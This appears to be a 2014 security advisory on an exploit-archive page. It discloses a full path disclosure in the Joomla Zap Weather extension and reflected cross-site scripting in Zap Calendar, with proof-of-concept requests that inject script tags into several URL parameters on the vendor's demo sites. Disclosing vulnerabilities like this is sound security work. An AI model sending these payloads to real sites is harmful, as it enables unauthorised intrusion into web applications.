Joomla Zap Weather FPD & Zap Calendar XSS

2014.01.21

Credit: Smash_

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Title - Joomla Zap Weather FPD & Zap Calendar XSS
#Date: 01.21.2014
#Vendor: zcontent.net ( extensions.joomla.org/extensions/owner/cogliano )
#Versions - Z Weather v9 & Zap Calendar v4.0 (Latests ATM)
#Contant: smash[at]devilteam.pl

#Zap Weather

PoC - zcontent.net/demo/zapweather

1. Full Path Disclosure

Request:
zcontent.net/demo/zapweather?view=location&id[]=5layout=alert&tmpl=component

OR

http://zcontent.net/demo/zapweather?view=location&id=-666&layout=alert&tmpl=component

Error appears:

Error
        Failed loading XML file

Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315

Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315

Warning: Invalid argument supplied for foreach() in /var/www/zcontent/components/com_zweather/views/location/view.html.php on line 324

#Zap Calendar

1. Cross Site Scripting at Events

- Itemid

GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1&Itemid=118"><script>alert(666)</script>&tmpl=component HTTP/1.1
Host: www.zapcalendar.com

- Calid

GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1"><script>alert(666)</script>&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com 

- Id

GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196"><script>alert(666)</script>&calid=1&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com

2. Cross Site Scripting at Calendar

- Itemid

Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118"><script>alert(666)</script>&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01&limitstart=0

- Ctype

Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m"><script>alert(666)</script>&ajax=1&format=raw&date=2014-05-01&limitstart=0

- Date

Request:
www.zapXcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01"><script>alert(666)</script>&limitstart=0

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Zap Weather FPD & Zap Calendar XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.